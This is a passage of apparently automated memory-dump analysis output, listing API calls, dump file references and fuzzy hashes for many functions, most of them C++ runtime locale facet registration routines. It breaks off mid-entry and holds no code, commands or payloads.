                                                                                                                                  • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,031A4653,?,05BD95B0), ref: 031A19E6
                                                                                                                                    • Part of subcall function 031A756E: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,031A19F2,00000000,?,?,031A4653,?,05BD95B0), ref: 031A7578
                                                                                                                                    • Part of subcall function 031A756E: _snprintf.NTDLL ref: 031A75D6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                                                                                                  • String ID: =
                                                                                                                                  • API String ID: 2864389247-1428090586
                                                                                                                                  • Opcode ID: e88ec1ff7b75e81dbb74a022b4c2971360f86d3a47ded964989443cf00d02bfa
                                                                                                                                  • Instruction ID: 7e7bbad9d4454e18b00ba11d7ebf7ef1290d490ed6e612435535876656a7baf1
                                                                                                                                  • Opcode Fuzzy Hash: e88ec1ff7b75e81dbb74a022b4c2971360f86d3a47ded964989443cf00d02bfa
                                                                                                                                  • Instruction Fuzzy Hash: EF11A33F901F247B8612FBAD9C84C6F67AD9E8D6A37094025F605EF200DF74C90257A4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E905688
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E905692
                                                                                                                                  • int.LIBCPMT ref: 6E9056A9
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E9056E3
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E905703
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E905710
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E90571D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3920336645-0
                                                                                                                                  • Opcode ID: 47fbccbaf4d3c66af652bee8934bc126aca6ac8b1d239c66fc3682141d645f9f
                                                                                                                                  • Instruction ID: 70cb1188cd3bd5326050782a795dcf9589d5bb0d0713073cc7b52933c554cb35
                                                                                                                                  • Opcode Fuzzy Hash: 47fbccbaf4d3c66af652bee8934bc126aca6ac8b1d239c66fc3682141d645f9f
                                                                                                                                  • Instruction Fuzzy Hash: 9921BE71900619DBCF12CFE8C9446EEBBB9AF94758F504D0DE8506B280CBB0D946CF81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7DA6
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7DB0
                                                                                                                                  • int.LIBCPMT ref: 6E8F7DC7
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7E01
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7E21
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7E2E
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7E3B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3920336645-0
                                                                                                                                  • Opcode ID: 8a0dba55f821380c3583f06942485365aa4d17700697163c691d3ebb1b63ee7a
                                                                                                                                  • Instruction ID: 62cd371ed5acbed92dd8687ec074053403f710fd931aeef3bd0212afc5d21419
                                                                                                                                  • Opcode Fuzzy Hash: 8a0dba55f821380c3583f06942485365aa4d17700697163c691d3ebb1b63ee7a
                                                                                                                                  • Instruction Fuzzy Hash: 8F21C37190061ADBCF02DFE8C9556EE7BB9AF45798F104D0EE8506B280DBB4DE06CB91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E93D196: _free.LIBCMT ref: 6E93D1BB
                                                                                                                                  • _free.LIBCMT ref: 6E93D4F9
                                                                                                                                    • Part of subcall function 6E931434: HeapFree.KERNEL32(00000000,00000000,?,6E93D1C0,?,00000000,?,?,?,6E93D4C4,?,00000007,?,?,6E93B43B,?), ref: 6E93144A
                                                                                                                                    • Part of subcall function 6E931434: GetLastError.KERNEL32(?,?,6E93D1C0,?,00000000,?,?,?,6E93D4C4,?,00000007,?,?,6E93B43B,?,?), ref: 6E93145C
                                                                                                                                  • _free.LIBCMT ref: 6E93D504
                                                                                                                                  • _free.LIBCMT ref: 6E93D50F
                                                                                                                                  • _free.LIBCMT ref: 6E93D563
                                                                                                                                  • _free.LIBCMT ref: 6E93D56E
                                                                                                                                  • _free.LIBCMT ref: 6E93D579
                                                                                                                                  • _free.LIBCMT ref: 6E93D584
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 39b13820a97e8b63a2bd5758ecc74a4ff61c4819cdfe69e10f1538665c390981
                                                                                                                                  • Instruction ID: 1d6ea0232c3b17981f01e70afe98d97150181f461490c57587651ce70f166d46
                                                                                                                                  • Opcode Fuzzy Hash: 39b13820a97e8b63a2bd5758ecc74a4ff61c4819cdfe69e10f1538665c390981
                                                                                                                                  • Instruction Fuzzy Hash: 99118131951B24ABE520ABF0CC09FCB77AE5FA1708F904D14E29966262DB34F5188EA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F1C9D
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F1CA7
                                                                                                                                  • int.LIBCPMT ref: 6E8F1CBE
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • numpunct.LIBCPMT ref: 6E8F1CE1
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F1CF8
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F1D18
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F1D25
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3064348918-0
                                                                                                                                  • Opcode ID: 12d335e6f6f7b156dff9692d7761dc7e5c65f9840653dd94bc3b02f4a9dd28ed
                                                                                                                                  • Instruction ID: 25b3e64841940af01c0726f8d2e04ccf7593446a050bdbc4f0793be7161eef49
                                                                                                                                  • Opcode Fuzzy Hash: 12d335e6f6f7b156dff9692d7761dc7e5c65f9840653dd94bc3b02f4a9dd28ed
                                                                                                                                  • Instruction Fuzzy Hash: 6A11A071900619CBCB01DBE8C9547EDBBB9AF85398F244D08D4106B291DF78994B8B91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F76AA
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F76B4
                                                                                                                                  • int.LIBCPMT ref: 6E8F76CB
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • moneypunct.LIBCPMT ref: 6E8F76EE
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7705
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7725
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7732
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3376033448-0
                                                                                                                                  • Opcode ID: bc1c7e844a45d9e42bbf48954f26c998c10ef990978bc47933128bb72f022cc7
                                                                                                                                  • Instruction ID: afc37bdf51097a3f4d9e8732628360971be9f2a493777e728531e9b3d8e27067
                                                                                                                                  • Opcode Fuzzy Hash: bc1c7e844a45d9e42bbf48954f26c998c10ef990978bc47933128bb72f022cc7
                                                                                                                                  • Instruction Fuzzy Hash: DF01ED3191061ACBCB01DBE8C954AEDB7B9AF853A8F114C08D8106B2C0DB74D90BCB90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7615
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F761F
                                                                                                                                  • int.LIBCPMT ref: 6E8F7636
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • moneypunct.LIBCPMT ref: 6E8F7659
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7670
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7690
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F769D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3376033448-0
                                                                                                                                  • Opcode ID: aa920c784afd7c0b5a05082a07aefc037d607c27282b2d292fb4f4cc37df7121
                                                                                                                                  • Instruction ID: 240f73b79692adb266f9e352a6cceda0ba1cb31d7153e4a98ae88e4c048d88c1
                                                                                                                                  • Opcode Fuzzy Hash: aa920c784afd7c0b5a05082a07aefc037d607c27282b2d292fb4f4cc37df7121
                                                                                                                                  • Instruction Fuzzy Hash: 1301E131900619DBCB01DFE8C8546ED77796F853A8F214D19D4106B2C0DF74D94B8B80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F6FAE
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F6FB8
                                                                                                                                  • int.LIBCPMT ref: 6E8F6FCF
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • codecvt.LIBCPMT ref: 6E8F6FF2
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7009
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7029
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7036
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2133458128-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F77D4
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F77DE
                                                                                                                                  • int.LIBCPMT ref: 6E8F77F5
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • moneypunct.LIBCPMT ref: 6E8F7818
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F782F
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F784F
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F785C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3376033448-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F6F19
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F6F23
                                                                                                                                  • int.LIBCPMT ref: 6E8F6F3A
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • codecvt.LIBCPMT ref: 6E8F6F5D
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F6F74
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F6F94
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F6FA1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2133458128-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F773F
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7749
                                                                                                                                  • int.LIBCPMT ref: 6E8F7760
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • moneypunct.LIBCPMT ref: 6E8F7783
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F779A
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F77BA
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F77C7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3376033448-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E9054C9
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E9054D3
                                                                                                                                  • int.LIBCPMT ref: 6E9054EA
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • moneypunct.LIBCPMT ref: 6E90550D
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E905524
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E905544
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E905551
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3376033448-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E90555E
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E905568
                                                                                                                                  • int.LIBCPMT ref: 6E90557F
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • moneypunct.LIBCPMT ref: 6E9055A2
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E9055B9
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E9055D9
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E9055E6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3376033448-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7297
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F72A1
                                                                                                                                  • int.LIBCPMT ref: 6E8F72B8
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • messages.LIBCPMT ref: 6E8F72DB
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F72F2
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7312
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F731F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 958335874-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7ABD
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7AC7
                                                                                                                                  • int.LIBCPMT ref: 6E8F7ADE
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • numpunct.LIBCPMT ref: 6E8F7B01
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7B18
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7B38
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7B45
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3064348918-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F1ADE
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F1AE8
                                                                                                                                  • int.LIBCPMT ref: 6E8F1AFF
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • ctype.LIBCPMT ref: 6E8F1B22
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F1B39
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F1B59
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F1B66
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2958136301-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F1A49
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F1A53
                                                                                                                                  • int.LIBCPMT ref: 6E8F1A6A
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • codecvt.LIBCPMT ref: 6E8F1A8D
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F1AA4
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F1AC4
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F1AD1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2133458128-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E905275
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E90527F
                                                                                                                                  • int.LIBCPMT ref: 6E905296
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • collate.LIBCPMT ref: 6E9052B9
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E9052D0
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E9052F0
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E9052FD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1767075461-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E90530A
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E905314
                                                                                                                                  • int.LIBCPMT ref: 6E90532B
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • messages.LIBCPMT ref: 6E90534E
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E905365
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E905385
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E905392
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 958335874-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F732C
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7336
                                                                                                                                  • int.LIBCPMT ref: 6E8F734D
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • messages.LIBCPMT ref: 6E8F7370
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7387
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F73A7
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F73B4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 958335874-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7B52
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7B5C
                                                                                                                                  • int.LIBCPMT ref: 6E8F7B73
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • numpunct.LIBCPMT ref: 6E8F7B96
